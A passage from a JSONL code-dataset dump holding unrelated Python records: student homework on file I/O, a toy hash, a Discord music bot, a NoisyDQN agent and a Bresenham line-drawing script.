print('Usage: optimise-pngs.py ')\n return 1\n\n rootdir = sys.argv[1]\n\n for root, dirnames, filenames in os.walk(rootdir):\n for filename in filenames:\n if not filename.lower().endswith('.png'):\n continue\n filepath = os.path.join(root, filename)\n pngcrush(filepath)\n\n\nif __name__ == '__main__':\n 
sys.exit(main())\n","sub_path":"extra/optimise-pngs.py","file_name":"optimise-pngs.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333840144","text":"\"\"\"\nGeorgia Institute of Technology - CS1301\nHW08 - File I/O\n\"\"\"\n__author__ = \"\"\" Jade Law \"\"\"\n__collab__ = \"\"\" I worked on some of the problems with Rashmi Athavale. \"\"\"\n\n\"\"\"\nFunction name: get_roster\nParameters: filename (string)\nReturns: Read in a file of any name, but assume it is in the format stated\nabove. Go through every line and make a list of tuples of all the students\nin the class. The tuples will be formatted (FirstName, LastName). Return this\nlist. If the file is not found, catch a FileNotFoundError and return\n“File is not found.” \n\"\"\"\ndef get_roster(filename):\n tuplist = []\n num = 0\n try:\n file = open(filename,\"r\")\n lines = file.readlines()\n for line in lines:\n if \",\" in line:\n line = line.strip()\n num = line.find(\",\")\n tuplist.append((line[:num], line[num+2:]))\n else:\n continue\n file.close()\n return tuplist\n except FileNotFoundError:\n return \"File is not found.\"\n\n\"\"\"\nFunction name: get_average\nParameters: filename (string), student (string)\nReturns: A tuple with the name of the student (without the comma)\nand their average for their exams\nDescription: Read in a file of any name but in the format as what is stated\nabove. For the student passed into the function, find the student and take\nthe average of their test scores. The average will be a float rounded to two\ndecimals. Return this data as a tuple in the format\n(FirstName LastName, Average). If the student is not found in the file,\nreturn “Student not found in file.”. 
If the file is not found, catch a\nFileNotFoundError and return “File is not found.” \n\"\"\"\ndef get_average(filename, student):\n studentname = student.split()\n studentname = studentname[0] + \", \" + studentname [1] + \"\\n\"\n avgscore = 0\n try:\n file = open(filename,\"r\")\n lines = file.readlines()\n lines.append(\"\\n\")\n num = lines.index(studentname)\n lines = lines[num+1:]\n num = lines.index(\"\\n\")\n lines = lines[:num]\n for score in lines:\n num = score.find(\":\")\n score = float(score[num+2:])\n avgscore += score\n avgscore = round(avgscore/len(lines),2)\n file.close()\n return (student, avgscore)\n except FileNotFoundError:\n return \"File is not found.\"\n except ValueError:\n file.close()\n return \"Student not found in file.\"\n\n\"\"\"\nFunction name: get_all_averages\nParameters: filename (string)\nReturns: A dictionary representing a student as the key,\nand their average on exams as the value\nDescription: Read in a file of any name but in the format as what is stated\nabove. For every student, make an entry in a dictionary where their first\nname is the key and their average for their exams as the value. The file will\nnot have duplicate first names. The average will be a float rounded to two\ndecimals. 
If the file is not found, catch a FileNotFoundError and return\n“File is not found.” \n\"\"\"\n\ndef get_all_averages(filename):\n newdict = {}\n name = \"\"\n score = 0\n testcount = 0\n try:\n file = open(filename,\"r\")\n lines = file.readlines()\n for line in lines:\n if \",\" in line:\n name = line[:line.find(\",\")]\n elif \":\" in line:\n line = line.strip()\n score += float(line[line.find(\":\")+2:])\n testcount += 1\n else:\n newdict[name] = round(score/testcount,2)\n name = \"\"\n score = 0\n testcount = 0\n newdict[name] = round(score/testcount,2)\n file.close()\n return newdict\n except FileNotFoundError:\n return \"File is not found.\"\n\n\"\"\"\nFunction name: form_groups\nParameters: filename (string), current_student (string), num_per_team (int)\nReturns: None\nDescription: Read in a file of any name but in the format as what is stated\nabove. If the file is not found, catch a FileNotFoundError and return\n“File is not found.”. In a new file to write named group.txt, write\n“Team StudentName” on one line, replacing StudentName with the name of the\ncurrent student passed in. Go through the file to find the top X-1 number\nof students to add to your team, top being those with the highest averages.\nX is the number passed in representing the maximum number of people per team,\nand X-1 is the number of students selected on the team minus the current\nstudent. The current student can not be one of the students added to the team.\nIf there are less than X number of students, then everyone in the file is\nincluded on the team. However, the number of students in a team can not exceed\nX. If X == 1, then just write the header on the file “Team StudentName”\nand if X == 0, then do not write anything to the file. There will not be more\nthan one student with the same average. 
Each of these students will be a\nseparate line in the new file in the format of “Y) Student Name”, Y being a\nnumber in a list in increasing order, going from 1 - the maximum number of\npeople per team. The top student will be 1, and then it will go down in\ndecreasing top scores. The last line of the file should not have a “\\n”.\nThis function will return None unless there is an error.\n\"\"\"\ndef form_groups(filename, current_student, num_per_team):\n studentname = current_student.split()\n studentname = studentname[0] + \", \" + studentname [1] + \"\\n\"\n score = 0\n testcount = 0\n studict = {}\n try:\n stufile = open(filename,\"r\")\n lines = stufile.readlines()\n lines.append(\"\\n\")\n for line in lines:\n if \",\" in line:\n name = line\n if name != studentname:\n if \",\" in line:\n student = line.strip()\n student = student[:line.find(\",\")]\n student += line[line.find(\",\")+1:line.find(\"\\n\")]\n elif \":\" in line:\n line = line.strip()\n score += float(line[line.find(\":\")+2:])\n testcount += 1\n else:\n studict[student] = round(score/testcount,2)\n student = \"\"\n score = 0\n testcount = 0\n stufile.close()\n groupfile = open(\"group.txt\",\"w\")\n groupfile.write(\"Team \" + current_student + \"\\n\")\n if num_per_team-1 < len(studict.keys()):\n for i in range(num_per_team-1):\n highest = -1\n for name,avg in studict.items():\n if avg > highest:\n highest = avg\n highestName = name\n groupfile.write(\"{}) {}\\n\".format(i+1, highestName))\n del studict[highestName]\n elif num_per_team-1 > len(studict.keys()):\n for i in range(len(studict.keys())):\n highest = -1\n for name,avg in studict.items():\n if avg > highest:\n highest = avg\n highestName = name\n groupfile.write(\"{}) {}\\n\".format(i+1, highestName))\n del studict[highestName]\n groupfile.close()\n except FileNotFoundError:\n return \"File is not found.\"\n \nform_groups('files/CS1332.txt', 'Steve Jobs', 0)\n\"\"\"\nFunction name: zero_calorie_diet\nParameters: filename 
(string)\nReturns: A string representing the name of a dish\nDescription: Read in a file of any name but in the format as what is stated\nabove. If the file is not found, catch a FileNotFoundError and return\n“File is not found.”. You are trying to go on a low calorie diet, so parse\nthrough the file and return the name of the dish with the least amount of\ncalories. If two dishes have the same amount of calories, return the one that\noccurred first. \n\"\"\"\ndef zero_calorie_diet(filename):\n try:\n file = open(filename,\"r\")\n heading = file.readline()\n lines = file.readlines()\n lowcal = 10000000000000\n for line in lines:\n line = line.split(\",\")\n line[2] = int(line[2])\n line = tuple(line)\n (name, price, cal, cuisine) = (line[0], line[1], line[2], line[3])\n if cal < lowcal:\n lowcal = cal\n lowfood = name\n file.close()\n return lowfood\n except FileNotFoundError:\n return \"File is not found.\"\n\n\"\"\"\nFunction name: erica_menu\nParameters: filename (string), num_of_dishes (int)\nReturns: None\nDescription: Read in a file of any name but in the format as what is stated\nabove. If the file is not found, catch a FileNotFoundError and return\n“File is not found.”. Erica wants to put together an ideal menu for her,\nconsisting of the same or less number of items than the number passed in,\nbut never more. There are conditions, however, since she is broke and very\npicky. Parse through the file and create a menu for Erica by choosing the\ncheapest dishes. However, never put a Vegetarian dish on her menu, because\nshe will not eat it. What this means is that if there are 4 dishes on the\nlist, one being Vegetarian, and she wants 4 items on her menu, then her menu\nwill consist of 3 dishes. You will be writing this menu out onto a new file\nnamed EricaMenu.txt. 
The first line of the file will be “Erica’s Menu” and\nevery corresponding line after that will be the Dish Name, Price, and Cuisine\nType all on the same line, with each dish being on a separate line.\nPrice will have a $ preceding the number and each element for a line, except\nthe last element, will be followed by a “, “ (comma and space). The last\nline will not have a “\\n”. This function will return None, unless there is an\nerror. \n\"\"\"\ndef erica_menu(filename, num_of_dishes):\n try:\n file = open(filename,\"r\")\n heading = file.readline()\n lines = file.readlines()\n menu = open(\"EricaMenu.txt.\",\"w\")\n menu.write(\"Erica's Menu\\n\")\n used = []\n foods = {}\n num = 0\n for line in lines:\n line = line.split(\",\")\n line[1] = float(line[1][1:])\n line[3] = line[3].strip()\n line = tuple(line)\n (name, price, cal, cuisine) = (line[0], line[1], line[2], line[3])\n if cuisine != \"Vegetarian\":\n foods[name] = (price, cuisine)\n for i in range(num_of_dishes):\n if len(foods) != 1:\n cheapest = 100000000\n for food in foods:\n (price, cuisine) = (foods[food][0], foods[food][1])\n if price < cheapest:\n cheapest = price\n cheapfood = food\n cheapcuisine = cuisine\n menu.write(\"{}, ${}, {}\\n\".format(cheapfood, str(cheapest), cheapcuisine))\n del foods[cheapfood]\n else:\n for food in foods:\n menu.write(\"{}, ${}, {}\".format(food, foods[food][0], foods[food][1]))\n break\n file.close()\n menu.close()\n except FileNotFoundError:\n return \"File is not found.\"\n\nerica_menu('files/chikfila.csv', 0)\nerica_menu('files/westvillage.csv', 10)\nerica_menu('files/chikfila.csv', 4)\nerica_menu('files/chikfila.csv', 10)\n","sub_path":"HW08_FileIO.py","file_name":"HW08_FileIO.py","file_ext":"py","file_size_in_byte":11371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"646238326","text":"\"\"\"\r\nSimple interest formula is given by:\r\nSimple Interest = (P x T x R)/100\r\nWhere,\r\nP is the principle 
amount\r\nT is the time and\r\nR is the rate\r\n\r\n\"\"\"\r\ndef si(p,r,t):\r\n si = (P * R * T) / 100\r\n return si\r\n\r\nP = 1000\r\nR = 5\r\nT = 5\r\n\r\nprint(si(P,R,T))\r\n","sub_path":"Python Program for simple interest.py","file_name":"Python Program for simple interest.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584670586","text":"import random\n\n\ndef hash(plain):\n cols = 4\n # Kodomain yang digunakan berupa huruf w/x/y/z (119-122)\n char = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\",\n \"8\", \"9\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n startChar = 97\n codomain = [0]*cols\n result = ''\n\n # Random digunakan sebagai padding apabila len(plain)= cols:\n break\n plain += chr(startChar + random.randint(0, 26))\n\n # Membagi string kedalam 4 kolom codomain\n # Lalu setiap char di kolom tersebut di XOR kan nilai ASCII nya\n for i in range(len(plain)):\n modulo = i % cols\n codomain[modulo] ^= ord(plain[i])\n\n # Setiap kolom dijadikan char dengan nilai w/x/y/z sesuai hasil xor % 4\n # Ditambah startChar\n for i in range(cols):\n result += chr(startChar + (codomain[i] % cols))\n\n return result\n\n\n# Meminta input dan menampilkan hasil\nplain = input(\"Plain text: \")\n\ndigest = hash(plain)\nprint(\"Digest: \", end='')\nprint(digest)\n","sub_path":"minggu4/digestV2.py","file_name":"digestV2.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274700763","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright (c) 2019 Valentin B.\nRequirements:\nPython 3.5+\npip install -U discord.py pynacl youtube-dl\nYou also need FFmpeg in your PATH environment variable or the FFmpeg.exe binary in your client's directory on Windows.\n\"\"\"\n\n\"\"\"\nMerci A Valentin B pour son code source qui m'as permis d'apprendre beaucoup\n\"\"\"\n\nimport 
asyncio\nimport functools\nimport itertools\nimport math\nimport random\n\nimport discord\nimport youtube_dl\nfrom async_timeout import timeout\nfrom discord.ext import commands\n\n# Silence useless bug reports messages\nyoutube_dl.utils.bug_reports_message = lambda: ''\n\n\nclass VoiceError(Exception):\n pass\n\n\nclass YTDLError(Exception):\n pass\n\n\nclass YTDLSource(discord.PCMVolumeTransformer):\n YTDL_OPTIONS = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': 'mp3',\n 'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',\n 'restrictfilenames': True,\n 'noplaylist': False,\n 'nocheckcertificate': True,\n 'ignoreerrors': False,\n 'logtostderr': False,\n 'quiet': True,\n 'no_warnings': True,\n 'default_search': 'auto',\n 'source_address': '0.0.0.0',\n }\n\n FFMPEG_OPTIONS = {\n 'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',\n 'options': '-vn',\n }\n\n ytdl = youtube_dl.YoutubeDL(YTDL_OPTIONS)\n\n def __init__(self, ctx: commands.Context, source: discord.FFmpegPCMAudio, *, data: dict, volume: float = 0.5):\n super().__init__(source, volume)\n\n self.requester = ctx.author\n self.channel = ctx.channel\n self.data = data\n\n self.uploader = data.get('uploader')\n self.uploader_url = data.get('uploader_url')\n date = data.get('upload_date')\n self.upload_date = date[6:8] + '.' + date[4:6] + '.' 
+ date[0:4]\n self.title = data.get('title')\n self.thumbnail = data.get('thumbnail')\n self.description = data.get('description')\n self.duration = self.parse_duration(int(data.get('duration')))\n self.tags = data.get('tags')\n self.url = data.get('webpage_url')\n self.views = data.get('view_count')\n self.likes = data.get('like_count')\n self.dislikes = data.get('dislike_count')\n self.stream_url = data.get('url')\n\n def __str__(self):\n return '**{0.title}** de **{0.uploader}**'.format(self)\n\n @classmethod\n async def create_source(cls, ctx: commands.Context, search: str, *, loop: asyncio.BaseEventLoop = None):\n loop = loop or asyncio.get_event_loop()\n\n partial = functools.partial(cls.ytdl.extract_info, search, download=False, process=False)\n data = await loop.run_in_executor(None, partial)\n\n if data is None:\n raise YTDLError(\"Je n'ai pas pu trouver de résultat `{}`\".format(search))\n\n if 'entries' not in data:\n process_info = data\n else:\n process_info = None\n for entry in data['entries']:\n if entry:\n process_info = entry\n break\n\n if process_info is None:\n raise YTDLError(\"Je n'ai pas pu trouver de résultat `{}`\".format(search))\n\n webpage_url = process_info['webpage_url']\n partial = functools.partial(cls.ytdl.extract_info, webpage_url, download=False)\n processed_info = await loop.run_in_executor(None, partial)\n\n if processed_info is None:\n raise YTDLError('Erreur - impossible de récuperer'.format(webpage_url))\n\n if 'entries' not in processed_info:\n info = processed_info\n else:\n info = None\n while info is None:\n try:\n info = processed_info['entries'].pop(0)\n except IndexError:\n raise YTDLError(\"Je n'ai pas pu trouver de résultat `{}`\".format(webpage_url))\n\n return cls(ctx, discord.FFmpegPCMAudio(info['url'], **cls.FFMPEG_OPTIONS), data=info)\n\n @staticmethod\n def parse_duration(duration: int):\n minutes, seconds = divmod(duration, 60)\n hours, minutes = divmod(minutes, 60)\n days, hours = divmod(hours, 24)\n\n 
duration = []\n if days > 0:\n duration.append('{} jours'.format(days))\n if hours > 0:\n duration.append('{} heures'.format(hours))\n if minutes > 0:\n duration.append('{} minutes'.format(minutes))\n if seconds > 0:\n duration.append('{} secondes'.format(seconds))\n\n return ', '.join(duration)\n\n\nclass Song:\n __slots__ = ('source', 'requester')\n\n def __init__(self, source: YTDLSource):\n self.source = source\n self.requester = source.requester\n\n def create_embed(self):\n embed = (discord.Embed(title='Joue actuellement',\n description='```css\\n{0.source.title}\\n```'.format(self),\n color=discord.Color.blurple())\n .add_field(name='Durée', value=self.source.duration)\n .add_field(name='Requête de', value=self.requester.mention)\n .add_field(name='Auteur', value='[{0.source.uploader}]({0.source.uploader_url})'.format(self))\n .add_field(name='URL', value='[Click]({0.source.url})'.format(self))\n .set_thumbnail(url=self.source.thumbnail))\n\n return embed\n\n\nclass SongQueue(asyncio.Queue):\n def __getitem__(self, item):\n if isinstance(item, slice):\n return list(itertools.islice(self._queue, item.start, item.stop, item.step))\n else:\n return self._queue[item]\n\n def __iter__(self):\n return self._queue.__iter__()\n\n def __len__(self):\n return self.qsize()\n\n def clear(self):\n self._queue.clear()\n\n def shuffle(self):\n random.shuffle(self._queue)\n\n def remove(self, index: int):\n del self._queue[index]\n\n\nclass VoiceState:\n def __init__(self, client, ctx: commands.Context):\n self.client = client\n self._ctx = ctx\n\n self.current = None\n self.voice = None\n self.next = asyncio.Event()\n self.songs = SongQueue()\n\n self._loop = False\n self._volume = 0.5\n self.skip_votes = set()\n\n self.audio_player = client.loop.create_task(self.audio_player_task())\n\n def __del__(self):\n self.audio_player.cancel()\n\n @property\n def loop(self):\n return self._loop\n\n @loop.setter\n def loop(self, value: bool):\n self._loop = value\n\n @property\n def 
volume(self):\n return self._volume\n\n @volume.setter\n def volume(self, value: float):\n self._volume = value\n\n @property\n def is_playing(self):\n return self.voice and self.current\n\n async def audio_player_task(self):\n while True:\n self.next.clear()\n\n if not self.loop:\n # Try to get the next song within 60 minutes.\n # If no song will be added to the queue in time,\n # the player will disconnect due to performance\n # reasons.\n try:\n async with timeout(3600): # 60 minutes\n self.current = await self.songs.get()\n except asyncio.TimeoutError:\n self.client.loop.create_task(self.stop())\n await self._ctx.send(\"Timeout\")\n return\n\n self.current.source.volume = self._volume\n self.voice.play(self.current.source, after=self.play_next_song)\n await self.current.source.channel.send(embed=self.current.create_embed())\n\n await self.next.wait()\n\n def play_next_song(self, error=None):\n if error:\n raise VoiceError(str(error))\n\n self.next.set()\n\n def skip(self):\n self.skip_votes.clear()\n\n if self.is_playing:\n self.voice.stop()\n\n async def stop(self):\n self.songs.clear()\n\n if self.voice:\n await self.voice.disconnect()\n self.voice = None\n\n\nclass Musique(commands.Cog):\n def __init__(self, client):\n self.client = client\n self.voice_states = {}\n print(\"Music is loaded\")\n\n def get_voice_state(self, ctx: commands.Context):\n state = self.voice_states.get(ctx.guild.id)\n if not state:\n state = VoiceState(self.client, ctx)\n self.voice_states[ctx.guild.id] = state\n\n return state\n\n def cog_unload(self):\n for state in self.voice_states.values():\n self.client.loop.create_task(state.stop())\n\n def cog_check(self, ctx: commands.Context):\n if not ctx.guild:\n raise commands.NoPrivateMessage('Cette commande ne peut être utilisée en message privé')\n\n return True\n\n async def cog_before_invoke(self, ctx: commands.Context):\n ctx.voice_state = self.get_voice_state(ctx)\n\n async def cog_command_error(self, ctx: commands.Context, error: 
commands.CommandError):\n await ctx.send('Erreur: {}'.format(str(error)))\n\n @commands.command(name='summon', invoke_without_subcommand=True)\n async def _join(self, ctx: commands.Context):\n \"\"\"Invoque Sisyphe dans le salon courant.\"\"\"\n\n destination = ctx.author.voice.channel\n if ctx.voice_state.voice:\n await ctx.voice_state.voice.move_to(destination)\n return\n\n ctx.voice_state.voice = await destination.connect()\n\n @commands.command(name='join')\n @commands.has_permissions(manage_guild=True)\n async def _summon(self, ctx: commands.Context, *, channel: discord.VoiceChannel = None):\n \"\"\"Déplace Sisyphe dans le salon courant ou l'invoque.\n \"\"\"\n\n if not channel and not ctx.author.voice:\n raise VoiceError(\"Vous devez d'abord rejoindre un salon vocal\")\n\n destination = channel or ctx.author.voice.channel\n if ctx.voice_state.voice:\n await ctx.voice_state.voice.move_to(destination)\n return\n\n ctx.voice_state.voice = await destination.connect()\n\n @commands.command(name='leave', aliases=['disconnect'])\n @commands.has_permissions(manage_guild=True)\n async def _leave(self, ctx: commands.Context):\n \"\"\"Renvoit Sisyphe.\"\"\"\n\n if not ctx.voice_state.voice:\n return await ctx.send(\"Sisyphe n'est pas dans un salon vocal\")\n\n await ctx.voice_state.stop()\n del self.voice_states[ctx.guild.id]\n\n @commands.command(name='volume')\n async def _volume(self, ctx: commands.Context, *, volume: int):\n \"\"\"Change le volume du lecteur.\"\"\"\n\n if not ctx.voice_state.is_playing:\n return await ctx.send(\"Rien n'est joué pour le moment\")\n\n if 0 > volume > 100:\n return await ctx.send('Le volume doit être entre 0 et 100')\n\n ctx.voice_state.volume = volume / 100\n await ctx.send('Volume mis à {}%'.format(volume))\n\n @commands.command(name='now', aliases=['current', 'playing'])\n async def _now(self, ctx: commands.Context):\n \"\"\"Montre les informations de la musique.\"\"\"\n\n await 
ctx.send(embed=ctx.voice_state.current.create_embed())\n\n @commands.command(name='pause')\n @commands.has_permissions(manage_guild=True)\n async def _pause(self, ctx: commands.Context):\n \"\"\"Mets en pause.\"\"\"\n\n if ctx.voice_state.voice.is_playing():\n ctx.voice_state.voice.pause()\n await ctx.message.add_reaction('⏯')\n\n @commands.command(name='resume')\n @commands.has_permissions(manage_guild=True)\n async def _resume(self, ctx: commands.Context):\n \"\"\"Enlève la pause.\"\"\"\n\n if ctx.voice_state.voice.is_paused():\n ctx.voice_state.voice.resume()\n await ctx.message.add_reaction('⏯')\n\n @commands.command(name='clear',aliases=['stop'])\n @commands.has_permissions(manage_guild=True)\n async def _clear(self, ctx: commands.Context):\n \"\"\"Vide la file. (aliase:!stop)\"\"\"\n if ctx.voice_state:\n ctx.voice_state.songs.clear()\n if ctx.voice_state.is_playing:\n ctx.voice_state.voice.stop()\n await ctx.send(\"La file a été vidée\")\n await ctx.message.add_reaction('⏹')\n else:\n await ctx.send(\"Sisyphe n'est pas connecté\")\n\n @commands.command(name='skip')\n async def _skip(self, ctx: commands.Context):\n \"\"\"Vote pour passer.\n \"\"\"\n\n if not ctx.voice_state.is_playing:\n return await ctx.send('Ne joue rien actuellement')\n\n voter = ctx.message.author\n if voter == ctx.voice_state.current.requester:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n\n elif voter.id not in ctx.voice_state.skip_votes:\n ctx.voice_state.skip_votes.add(voter.id)\n total_votes = len(ctx.voice_state.skip_votes)\n\n if total_votes >= 2:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n else:\n await ctx.send('Actuellement **{} votes/2** pour passer'.format(total_votes))\n\n else:\n await ctx.send('Tu as déjà voté')\n\n @commands.command(name='queue')\n async def _queue(self, ctx: commands.Context, *, page: int = 1):\n \"\"\"Montre la file d'attente.\n \"\"\"\n\n if len(ctx.voice_state.songs) == 0:\n return await ctx.send('La file est 
vide')\n\n items_per_page = 10\n pages = math.ceil(len(ctx.voice_state.songs) / items_per_page)\n\n start = (page - 1) * items_per_page\n end = start + items_per_page\n\n queue = ''\n for i, song in enumerate(ctx.voice_state.songs[start:end], start=start):\n queue += '`{0}.` [**{1.source.title}**]({1.source.url})\\n'.format(i + 1, song)\n\n embed = (discord.Embed(description='**{} pistes:**\\n\\n{}'.format(len(ctx.voice_state.songs), queue))\n .set_footer(text='Viewing page {}/{}'.format(page, pages)))\n await ctx.send(embed=embed)\n\n @commands.command(name='shuffle')\n async def _shuffle(self, ctx: commands.Context):\n \"\"\"Mélange la file.\"\"\"\n\n if len(ctx.voice_state.songs) == 0:\n return await ctx.send('.')\n\n ctx.voice_state.songs.shuffle()\n await ctx.message.add_reaction('✅')\n\n @commands.command(name='remove')\n async def _remove(self, ctx: commands.Context, index: int):\n \"\"\"Enlève une musique à l'index donné.\"\"\"\n\n if len(ctx.voice_state.songs) == 0:\n return await ctx.send('Empty queue.')\n\n ctx.voice_state.songs.remove(index - 1)\n await ctx.message.add_reaction('✅')\n\n @commands.command(name='loop')\n async def _loop(self, ctx: commands.Context):\n \"\"\"Rejouer la musique actuelle. 
(NE MARCHE PAS)\n \"\"\"\n\n if not ctx.voice_state.is_playing:\n return await ctx.send(\"Rien n'ai joué actuellement\")\n\n # Inverse boolean value to loop and unloop.\n ctx.voice_state.loop = not ctx.voice_state.loop\n await ctx.message.add_reaction('✅')\n\n @commands.command(name='play')\n async def _play(self, ctx: commands.Context, *, search: str):\n \"\"\"Joue une musique avec un url ou un nom.\n \"\"\"\n\n if not ctx.voice_state.voice:\n await ctx.invoke(self._join)\n\n async with ctx.typing():\n try:\n source = await YTDLSource.create_source(ctx, search, loop=self.client.loop)\n except YTDLError as e:\n await ctx.send(\"Erreur lors de l'execution de la requête: {}\".format(str(e)))\n else:\n song = Song(source)\n\n await ctx.voice_state.songs.put(song)\n await ctx.send('Mise en file de {}'.format(str(source)))\n\n @commands.command(name='chacha')\n async def _chacha(self,ctx: commands.Context):\n \"\"\"On ne négocie pas avec les terroristes\n \"\"\"\n if not ctx.voice_state.voice:\n await ctx.invoke(self._join)\n \n ctx.voice_state.songs.clear()\n if ctx.voice_state.voice.is_playing():\n ctx.voice_state.voice.stop()\n ctx.voice_state.voice.play(discord.FFmpegPCMAudio('assets/chacha.mp3'))\n await ctx.send(\"On ne négocie pas avec les terroristes !\")\n\n\n @_join.before_invoke\n @_play.before_invoke\n async def ensure_voice_state(self, ctx: commands.Context):\n if not ctx.author.voice or not ctx.author.voice.channel:\n raise commands.CommandError(\"Vous n'etes pas connecté à un salon vocal\")\n\n if ctx.voice_client:\n if ctx.voice_client.channel != ctx.author.voice.channel:\n raise commands.CommandError('Sisyphe est déjà dans un salon vocal')\n\n #Greetings user if not playing\n @commands.Cog.listener()\n async def on_voice_state_update(self,member,before, after):\n if member.bot == False:\n guildid = member.guild.id\n voice_state = self.voice_states.get(guildid)\n if voice_state:\n if before.channel != voice_state.voice.channel and after.channel == 
voice_state.voice.channel:\n if voice_state.voice.is_playing() == False and voice_state.voice.is_paused() == False :\n voice_state.voice.play(discord.FFmpegPCMAudio('assets/chacha.mp3'))\n \ndef setup(client):\n client.add_cog(Musique(client))","sub_path":"cogs/musique.py","file_name":"musique.py","file_ext":"py","file_size_in_byte":17497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"380169034","text":"import copy\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\nimport gymnasium as gym\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom ..nn.dueling import Dueling\nfrom ..nn.fcn import FCN\nfrom ..nn.noisy_linear import NoisyLinear\nfrom .double_dqn import DoubleDQN\n\n\nclass NoisyDQNPolicy(nn.Sequential):\n\n def __init__(self, input_dim: int, output_dim: int, net_arch: List[int] = [128], deuling: bool = False) -> None:\n hidden_dim = input_dim if len(net_arch) == 0 else net_arch[-1]\n\n layers = [FCN(input_dim, output_dim=None, net_arch=net_arch)]\n if deuling:\n layers += [\n Dueling(\n nn.Sequential(\n NoisyLinear(hidden_dim, hidden_dim),\n nn.ReLU(inplace=True),\n NoisyLinear(hidden_dim, output_dim),\n ),\n nn.Sequential(\n NoisyLinear(hidden_dim, hidden_dim),\n nn.ReLU(inplace=True),\n NoisyLinear(hidden_dim, 1),\n ),\n )\n ]\n else:\n layers += [\n NoisyLinear(hidden_dim, hidden_dim),\n nn.ReLU(inplace=True),\n NoisyLinear(hidden_dim, output_dim),\n ]\n\n super(NoisyDQNPolicy, self).__init__(*layers)\n\n def reset_noise(self) -> None:\n for m in self.modules():\n if isinstance(m, NoisyLinear):\n m.reset_noise()\n\n\nclass NoisyDQN(DoubleDQN):\n\n def __init__(self,\n env: gym.Env,\n policy_kwargs: Optional[Dict[str, Any]] = None,\n learning_rate: float = 0.0001,\n buffer_size: int = 1000000,\n exploration_initial_epsilon: float = 1,\n exploration_final_epsilon: float = 0.01,\n exploration_fraction: float = 
0.5,\n batch_size: int = 32,\n gamma: float = 0.99,\n tau: float = 1,\n update_target_interval: int = 1000,\n max_grad_norm: float = 10.0,\n device: str = 'cuda',\n initial_setup: bool = True) -> None:\n super().__init__(env, policy_kwargs, learning_rate, buffer_size, exploration_initial_epsilon,\n exploration_final_epsilon, exploration_fraction, batch_size, gamma, tau,\n update_target_interval, max_grad_norm, device, initial_setup)\n\n def setup_models(self):\n self.policy_net = NoisyDQNPolicy(self.obs_dim, self.action_dim, **self.policy_kwargs).to(self.device)\n self.target_net = copy.deepcopy(self.policy_net).to(self.device)\n self.target_net.eval()\n\n @torch.no_grad()\n def predict(self, observation: Union[np.ndarray, Dict[str, np.ndarray]], deterministic: bool = False):\n\n obs = self._convert_tensor(observation)\n action = self.policy_net(obs).argmax().detach().item()\n\n return action\n\n def train(self):\n loss = super().train()\n\n self.policy_net.reset_noise()\n self.target_net.reset_noise()\n\n return loss\n","sub_path":"haruna/agents/noisy_dqn.py","file_name":"noisy_dqn.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458874599","text":"#############################################\n# @name = Aditya Shirwatkar\n# @github = aditya-shirwatkar\n# @copyright = None \n#############################################\n\n# x1, y1 should be lower\n\nx1 = -1; x2 = 1\ny1 = -2; y2 = 4\n\nm = round((y2-y1)/(x2-x1), 3) if (x2-x1) != 0 else 100000000 # used just to represnt inf\n\ndx = abs(x2-x1)\ndy = abs(y2-y1)\ntwo_dy = 2*dy \ntwo_dx = 2*dx\n\nlinePoints = []\np = []\np_current = 2*dy - dx\np.append(p_current)\n\ni=0\n\nprint('######### INFO #########')\nprint('x1 = ', x1, ' ', 'y1 = ', y1)\nprint('x2 = ', x2, ' ', 'y2 = ', y2)\nprint('dx = ', dx, ' ', 'dy = ', dy, ' ', 'm = ', m)\n\n## For m<1\nif m < 1:\n if abs(dx) > abs(dy):\n if x1 > x2:\n x, y = x2, y2\n 
else:\n x, y = x1, y1\n \n linePoints.append([x, y])\n\n while dx>0 :\n if p_current > 0 :\n x, y = x+1, y+1\n linePoints.append([x, y])\n p_current += (two_dy - two_dx)\n p.append(p_current)\n else:\n x += 1\n linePoints.append([x, y])\n p_current += two_dy\n p.append(p_current)\n \n dx-=1\n i+=1\n## for m >1\nelse:\n if y1>y2:\n x,y = x2, y2\n else:\n x,y = x1, y1\n \n linePoints.append([x, y])\n \n while dy>0 :\n if p_current > 0:\n x, y = x+1, y+1\n linePoints.append([x, y])\n p_current += two_dx - two_dy\n p.append(p_current) \n # elif p_current > 0 and dx == 0:\n # y += 1\n # linePoints.append([x, y])\n # p_current += two_dx - two_dy\n # p.append(p_current)\n else:\n y += 1\n linePoints.append([x, y])\n p_current += two_dx\n p.append(p_current)\n \n dy-=1\n i+=1\n\nprint('Line', linePoints)\nprint('-----------')\nprint('p', p)\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\n\nN = 4*len(linePoints)\n# make an empty data set\ndata = np.ones((N, N)) * np.nan\n# fill in some fake data\nfor point in linePoints:\n data[N-1 - (N//2 + point[1]), (point[0] + N//2)] = 1\n\n# make a figure + axes\nfig, ax = plt.subplots(1, 1, tight_layout=True)\n# make color map\nmy_cmap = colors.ListedColormap(['r', 'g', 'b'])\n# set the 'bad' values (nan) to be white and transparent\nmy_cmap.set_bad(color='w', alpha=0)\n# draw the 